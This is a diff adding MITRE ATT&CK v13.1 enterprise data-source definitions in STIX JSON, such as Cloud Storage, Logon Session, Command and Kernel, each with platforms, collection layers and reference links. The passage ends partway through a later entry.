diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc.json
new file mode 100644
index 0000000000000000000000000000000000000000..767d3b8970cb411438876ddec8a2c68038c86f38
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc.json
@@ -0,0 +1,56 @@
+{
+ "type": "bundle",
+ "id": "bundle--3456d744-cddd-4022-84e8-c6f3c3369c0e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "IaaS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Cloud Control Plane"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0010",
+ "external_id": "DS0010"
+ },
+ {
+ "source_name": "Amazon S3",
+ "description": "Amazon. (n.d.). Amazon S3. Retrieved October 13, 2021.",
+ "url": "https://aws.amazon.com/s3/"
+ },
+ {
+ "source_name": "Azure Blob Storage",
+ "description": "Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.",
+ "url": "https://azure.microsoft.com/en-us/services/storage/blobs/"
+ },
+ {
+ "source_name": "Google Cloud Storage",
+ "description": "Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.",
+ "url": "https://cloud.google.com/storage"
+ }
+ ],
+ "modified": "2021-11-10T09:30:48.694Z",
+ "name": "Cloud Storage",
+ "description": "Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17.json
new file mode 100644
index 0000000000000000000000000000000000000000..3893dbcbbff31d6b129dfb1720fa92a979e644d5
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17.json
@@ -0,0 +1,38 @@
+{
+ "type": "bundle",
+ "id": "bundle--4bc4267b-7394-470b-8024-a0779779144d",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "PRE"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_collection_layers": [
+ "OSINT"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.275Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0035",
+ "external_id": "DS0035"
+ }
+ ],
+ "modified": "2021-10-20T15:05:19.275Z",
+ "name": "Internet Scan",
+ "description": "Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6.json
new file mode 100644
index 0000000000000000000000000000000000000000..a8e4227753489a991c53d8b5579603fe605ce7df
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6.json
@@ -0,0 +1,38 @@
+{
+ "type": "bundle",
+ "id": "bundle--4c70a450-ced5-44f0-8f60-361a6d59627c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "PRE"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_collection_layers": [
+ "OSINT"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0021",
+ "external_id": "DS0021"
+ }
+ ],
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Persona",
+ "description": "A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec.json
new file mode 100644
index 0000000000000000000000000000000000000000..01c3f970823f4a6dbd7a5aa4b78fd3dbe31a224c
--- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--435fda01-f54c-4bee-84ca-dc5af7177707", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Office 365", + "SaaS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0036", + "external_id": "DS0036" + }, + { + "source_name": "Amazon IAM Groups", + "description": "Amazon. (n.d.). IAM user groups. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Group", + "description": "A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json new file mode 100644 index 0000000000000000000000000000000000000000..dbedac609870fd258ab523bf0f1feab9ce0d5844 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--dff8fa99-c2de-4a24-b0ae-6be2376ee0dc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0015", + "external_id": "DS0015" + }, + { + "source_name": "Confluence Logs", + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Application Log", + "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json new file mode 100644 index 0000000000000000000000000000000000000000..c2a334646506ef8a13b3e0aca4fc5b360fdf349a --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--34051c0b-e416-4cfd-b272-692045cb38a3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:45:09.019Z", + "name": "Logon Session", + "description": "Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)", + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0028", + "external_id": "DS0028" + }, + { + "source_name": "Microsoft Audit Logon Events", + "description": "Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0.json new file mode 100644 index 0000000000000000000000000000000000000000..885dce6dab364bf46c925bfd070bac692b4d47ef --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--6540dda7-e2c2-4d46-a1c0-ae598e850d0c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0030", + "external_id": "DS0030" + }, + { + "source_name": "Amazon VM", + "description": "Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved October 13, 2021.", + "url": "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/" + }, + { + "source_name": "Google VM", + "description": "Google. (n.d.). Virtual machine instances. Retrieved October 13, 2021.", + "url": "https://cloud.google.com/compute/docs/instances" + } + ], + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance", + "description": "A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers(Citation: Amazon VM)(Citation: Google VM)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json new file mode 100644 index 0000000000000000000000000000000000000000..8037a5d4e2c2ecca213aef3706ff0071815da10c --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8ff5b72e-e397-468a-b81d-41ae0b357eb6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:40.409Z", + "name": "Sensor Health", + "description": "Information from host telemetry providing insights about system status, errors, or other notable functional activity", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0013", + "external_id": "DS0013" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json new file mode 100644 index 0000000000000000000000000000000000000000..8c1239c1115538ff9513dec182ad0093ddfbbb29 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--fc453ec3-a687-4034-9768-12d798b83b0d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:35:34.863Z", + "name": "File", + "description": "A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)", + "x_mitre_platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0022", + "external_id": "DS0022" + }, + { + "source_name": "Microsoft File Mgmt", + "description": "Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json new file mode 100644 index 0000000000000000000000000000000000000000..ae77651559fe6a350f7d4066b8f8cdfe57178e47 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--83edd6e1-4b9b-4937-b81a-2b014cdcb2eb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0016", + "external_id": "DS0016" + }, + { + "source_name": "Sysmon EID 9", + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + } + ], + "modified": "2022-03-30T14:26:51.804Z", + "name": "Drive", + "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768.json new file mode 100644 index 0000000000000000000000000000000000000000..6592a67a5577fb8e12e1d841ec0b033988860d49 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--291aa6cf-2d70-4579-bd50-68192c3227dc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0020", + "external_id": "DS0020" + }, + { + "source_name": "Microsoft Snapshot", + "description": "Microsoft. (2021, September 16). Create a snapshot of a virtual hard disk. Retrieved October 13, 2021.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk" + }, + { + "source_name": "Amazon Snapshots", + "description": "Amazon. (n.d.). Amazon EBS snapshots. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + } + ], + "modified": "2021-11-10T09:30:48.698Z", + "name": "Snapshot", + "description": "A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json new file mode 100644 index 0000000000000000000000000000000000000000..78e2fcf5e3b008b5e326e914f5ea5d41de6e295c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--6addcea6-7164-47e6-ac9c-d5a8ae77ccd0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:00.625Z", + "name": "Command", + "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Network", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Austin Clark, @c2defense" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0017", + "external_id": "DS0017" + }, + { + "source_name": "Confluence Linux Command Line", + "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + }, + { + "source_name": "Audit OSX", + "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.", + "url": "https://www.scip.ch/en/?labs.20150108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e.json new file mode 100644 index 0000000000000000000000000000000000000000..20f95186974983da8a744fd22ae08cfa06cbe4f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--2f6f3d8f-d018-442e-8f78-3dccfd6ecb1e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0008", + "external_id": "DS0008" + }, + { + "source_name": "STIG Audit Kernel Modules", + "description": "Unified Compliance Framework. (2016, December 20). The audit system must be configured to audit the loading and unloading of dynamic kernel modules.. Retrieved September 28, 2021.", + "url": "https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383" + }, + { + "source_name": "Init Man Page", + "description": "Kerrisk, M. (2021, March 22). INIT_MODULE(2). Retrieved September 28, 2021.", + "url": "https://man7.org/linux/man-pages/man2/init_module.2.html" + } + ], + "modified": "2021-11-10T09:30:48.696Z", + "name": "Kernel", + "description": "A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054.json new file mode 100644 index 0000000000000000000000000000000000000000..2724e0e4a2ce355abc02a79385c7f260b91c036d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--a378a551-f2fc-4580-be44-bcfb3b521802", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0027", + "external_id": "DS0027" + }, + { + "source_name": "IOKit Fundamentals", + "description": "Apple. (2014, April 9). What Is the I/O Kit?. Retrieved September 24, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html" + }, + { + "source_name": "Windows Getting Started Drivers", + "description": "Viviano, A. (2021, August 17). Getting started with Windows drivers: User mode and kernel mode. Retrieved September 24, 2021.", + "url": 